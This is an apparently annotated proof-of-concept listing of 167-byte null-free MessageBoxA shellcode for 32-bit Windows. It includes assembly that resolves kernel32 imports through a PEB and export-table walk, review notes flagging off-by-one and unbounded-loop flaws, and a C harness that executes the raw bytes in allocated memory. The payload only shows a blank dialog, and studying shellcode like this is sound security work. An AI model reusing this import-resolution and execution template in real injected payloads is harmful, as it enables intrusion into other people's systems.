167-byte null-free MessageBoxA shellcode for 32-bit Windows (resolves its imports at run time, no hard-coded addresses). Tested on 2000, XP, XP x64, Vista, 7, 8 M3 x64.
437fa45db69d2822c191ab5303e89feba74d2a148268c980c7da10a151e0f896
/*
;------------------------------------------------------------------------
;Title...................All Windows Null-free MessageBoxA Shellcode
;........................167 Bytes
;Release Date............7/11/2011
;Tested On...............Windows 2000, Windows XP, Windows XP x64,
;........................Windows Vista, Windows 7, Windows 8 M3 x64
;------------------------------------------------------------------------
;Author..................John Leitch
;Site....................http://www.autosectools.com/
;Email...................john@autosectools.com
;------------------------------------------------------------------------
bits 32                         ; 32-bit x86 only: the fs:[0x30] TEB/PEB walk in find_function is the 32-bit layout
xor ebx, ebx                    ; ebx = 0 for the life of the stub: base register for fs:[ebx+0x30]
                                ;   (keeps a 0x00 disp32 out of the encoding), seed for the name index,
                                ;   and the four NULL arguments pushed to MessageBoxA at the end
jmp short start                 ; find_function sits between here and the entry code
;================================
;Find Function
;================================
find_function:
;--------------------------------------------------------------------
; eax = find_function(dword name0, dword name1)
; In:  [esp+4] = first 4 bytes of the export name, [esp+8] = the next 4
;      (the caller pushes them in reverse order right before the call);
;      ebx = 0.
; Out: eax = absolute address of the first kernel32 export whose name
;      begins with those 8 bytes.
; Clobbers: ecx, edx, esi, edi, ebp, flags. The two argument dwords are
;      left on the stack; the caller must discard them.
; Only 8 bytes are compared, so "LoadLibr" / "GetProcA" resolve to
; LoadLibraryA / GetProcAddress only because those names sort first
; among the matching exports in the (alphabetical) name pointer table.
;--------------------------------------------------------------------
;================================
;Find Kernel32 Base
;================================
mov edi, [fs:ebx+0x30]          ; fs:[0x30] = PEB (ebx is 0, see prologue)
mov edi, [edi+0x0c]             ; PEB->Ldr
mov edi, [edi+0x1c]             ; Ldr->InInitializationOrderModuleList.Flink
module_loop:
mov eax, [edi+0x08]             ; entry->DllBase (offsets relative to the InInitializationOrder links)
mov esi, [edi+0x20]             ; entry->BaseDllName.Buffer (UTF-16)
mov edi, [edi]                  ; advance to the next entry before testing this one
cmp byte [esi+0x0C], '3'        ; 7th UTF-16 char: "kernel32.dll" has '3' at byte 12 (k0 e2 r4 n6 e8 l10 '3'12)
jne module_loop                 ; NOTE(review): one-byte test with no end-of-list check; an earlier module
                                ;   whose 7th character is '3' would be taken instead, and the loop never
                                ;   terminates if nothing matches
;================================
;Kernel32 PE Header
;================================
mov edi, eax                    ; eax = kernel32 base, kept as the RVA base for the rest of the routine
add edi, [eax+0x3c]             ; edi = base + e_lfanew = IMAGE_NT_HEADERS
;================================
; Export directory table
;================================
;0x00 Export Flags
;0x04 Time/Date Stamp
;0x08 Major Version
;0x0A Minor Version
;0x0C Name RVA
;0x10 Ordinal Base
;0x14 Address Table Entries
;0x18 Number Of Names
;0x1c Address Table RVA
;0x20 Name Pointer Table RVA
;0x24 Ordinal Table RVA
;================================
;================================
;Kernel32 Export Directory Table
;================================
mov edx, [edi+0x78]             ; DataDirectory[EXPORT].VirtualAddress (RVA)
add edx, eax                    ; edx = export directory (layout above)
;================================
;Kernel32 Name Pointers
;================================
mov edi, [edx+0x20]             ; Name Pointer Table RVA
add edi, eax                    ; edi = name pointer table
;================================
;Find LoadLibraryA
;================================
mov ebp, ebx                    ; ebp = 0 = name index (the routine is generic; "LoadLibraryA" is just the first caller)
name_loop:
mov esi, [edi+ebp*0x4]          ; esi = RVA of name[ebp]
add esi, eax                    ; esi = &name[ebp]
inc ebp                         ; from here on ebp = index + 1 (see the ordinal lookup below)
mov ecx, [esp+0x4]
cmp dword [esi], ecx            ; first 4 bytes of the name
jne name_loop
mov ecx, [esp+0x8]
cmp dword [esi+0x4], ecx        ; next 4 bytes
jne name_loop                   ; NOTE(review): no bound against Number Of Names ([edx+0x18]);
                                ;   an unmatched prefix keeps reading past the end of the table
;================================
;LoadLibraryA Ordinal
;================================
mov edi, [edx+0x24]             ; Ordinal Table RVA
add edi, eax                    ; edi = ordinal table (16-bit entries)
mov bp, [edi+ebp*0x2]           ; NOTE(review): ebp is index+1, so this loads the ordinal of the *next*
                                ;   name, not of the match; 16-bit load, the upper half of ebp keeps
                                ;   whatever index+1 had there
;================================
;LoadLibraryA Address
;================================
mov edi, [edx+0x1C]             ; Address Table RVA
add edi, eax                    ; edi = address table (32-bit RVAs)
mov edi, [edi+(ebp-0x1)*0x4] ;NOTE(review): the -1 compensates for the off-by-one above, not for the
                                ;   Ordinal Base (ordinal-table entries are already unbiased). Net effect
                                ;   is AddressTable[Ordinal[i+1]-1], which equals the correct
                                ;   AddressTable[Ordinal[i]] only while ordinals run in name order;
                                ;   that held on every tested version but is a property of kernel32's
                                ;   export layout, not of the PE format. Forwarder RVAs are not checked.
add eax, edi                    ; eax = base + function RVA
ret                             ; arguments still on the stack for the caller
start:
;================================
;Call LoadLibraryA
;================================
push 0x7262694C ;"Libr" - second dword of the "LoadLibr" prefix
push 0x64616F4C ;"Load" - first dword, ends up at [esp+4] inside find_function
call find_function              ; eax = LoadLibraryA; both dwords stay on the stack
xor ecx, ecx
mov cx, 0x3233 ;"32" in the low word; the zeroed high word supplies the terminator without a 0x00 in the encoding
push ecx
push 0x72657375 ;"user" - stack now holds "user32\0\0"
push esp ; lpFileName           ; &"user32"
call eax                        ; LoadLibraryA("user32"); stdcall, callee pops lpFileName
push eax                        ; save hUser32 (recovered by the third pop below)
;================================
;Call GetProcAddress
;================================
push 0x41636F72 ;"rocA" - second dword of the "GetProcA" prefix
push 0x50746547 ;"GetP"
call find_function              ; eax = GetProcAddress
pop ecx                         ; discard "GetP"
pop ecx                         ; discard "rocA"
pop ecx                         ; ecx = hUser32 saved above
push 0x041786F0; "oxA" shifted left 4 bits so the encoding stays null-free ...
shr dword [esp], 0x4            ; ... the shift produces the NUL terminator in memory: [esp] = "oxA\0"
push 0x42656761; "ageB"
push 0x7373654D; "Mess" - stack now holds "MessageBoxA\0"
push esp ; lpProcName           ; &"MessageBoxA"
push ecx ; hModule              ; hUser32
call eax                        ; GetProcAddress(hUser32, "MessageBoxA"); eax = MessageBoxA
;================================
;Call MessageBoxA
;================================
push ebx                        ; uType     = 0 (ebx is still 0)
push ebx                        ; lpCaption = NULL
push ebx                        ; lpText    = NULL
push ebx                        ; hWnd      = NULL
call eax                        ; MessageBoxA(NULL, NULL, NULL, 0)
                                ; NOTE(review): nothing follows - no ret/ExitProcess and the pushed
                                ;   strings are still on the stack, so once MessageBoxA returns execution
                                ;   runs off the end of the buffer; a host that wants a clean exit must
                                ;   not expect control back
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
using namespace std;
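int main()
{
    /* The stub is 32-bit code (`bits 32` above) and walks the 32-bit TEB/PEB,
     * so it has to run inside a 32-bit process. Refuse a 64-bit build up front
     * instead of faulting somewhere inside the stub. */
    if (sizeof(void*) != 4) {
        fprintf(stderr, "build this harness as 32-bit x86: the stub is 32-bit code\n");
        return 1;
    }

    /* Byte-for-byte encoding of the listing above: 167 bytes, no 0x00.
     * Kept as an array so the length comes from sizeof; strlen() on the
     * literal only works while the bytes stay null-free and would silently
     * truncate the copy if anyone edited them. */
    static const unsigned char shellcode[] =
        "\x31\xdb\xeb\x55\x64\x8b\x7b\x30"
        "\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47"
        "\x08\x8b\x77\x20\x8b\x3f\x80\x7e"
        "\x0c\x33\x75\xf2\x89\xc7\x03\x78"
        "\x3c\x8b\x57\x78\x01\xc2\x8b\x7a"
        "\x20\x01\xc7\x89\xdd\x8b\x34\xaf"
        "\x01\xc6\x45\x8b\x4c\x24\x04\x39"
        "\x0e\x75\xf2\x8b\x4c\x24\x08\x39"
        "\x4e\x04\x75\xe9\x8b\x7a\x24\x01"
        "\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c"
        "\x01\xc7\x8b\x7c\xaf\xfc\x01\xf8"
        "\xc3\x68\x4c\x69\x62\x72\x68\x4c"
        "\x6f\x61\x64\xe8\x9c\xff\xff\xff"
        "\x31\xc9\x66\xb9\x33\x32\x51\x68"
        "\x75\x73\x65\x72\x54\xff\xd0\x50"
        "\x68\x72\x6f\x63\x41\x68\x47\x65"
        "\x74\x50\xe8\x7d\xff\xff\xff\x59"
        "\x59\x59\x68\xf0\x86\x17\x04\xc1"
        "\x2c\x24\x04\x68\x61\x67\x65\x42"
        "\x68\x4d\x65\x73\x73\x54\x51\xff"
        "\xd0\x53\x53\x53\x53\xff\xd0";
    const size_t len = sizeof(shellcode) - 1;   /* drop the literal's terminating NUL */

    /* size_t is not an int; cast rather than pass it to %i. Newline so the
     * line is flushed before the stub runs (it never returns cleanly, see below). */
    printf("shellcode length: %u\n", (unsigned)len);

    /* W^X: stage the bytes in a writable page, then flip it to execute-only-read
     * before jumping in. MEM_RESERVE is paired with MEM_COMMIT as the API expects
     * for a fresh (lpAddress == NULL) region. The allocation is page-granular, so
     * the bytes after the stub are zero-filled exactly as with the old 4096 request. */
    LPVOID lpAlloc = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (lpAlloc == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }
    memcpy(lpAlloc, shellcode, len);

    DWORD oldProtect = 0;
    if (!VirtualProtect(lpAlloc, len, PAGE_EXECUTE_READ, &oldProtect)) {
        fprintf(stderr, "VirtualProtect failed: %lu\n", (unsigned long)GetLastError());
        VirtualFree(lpAlloc, 0, MEM_RELEASE);
        return 1;
    }
    /* Required after writing code through a data mapping before executing it. */
    FlushInstructionCache(GetCurrentProcess(), lpAlloc, len);

    /* NOTE(review): the stub ends with `call eax` (MessageBoxA) and has no ret or
     * ExitProcess, and it leaves its string arguments on the stack, so control does
     * not come back here once the dialog is dismissed; a fault after that point is
     * the stub's doing, not the harness's. */
    ((void(*)())lpAlloc)();
    return 0;
}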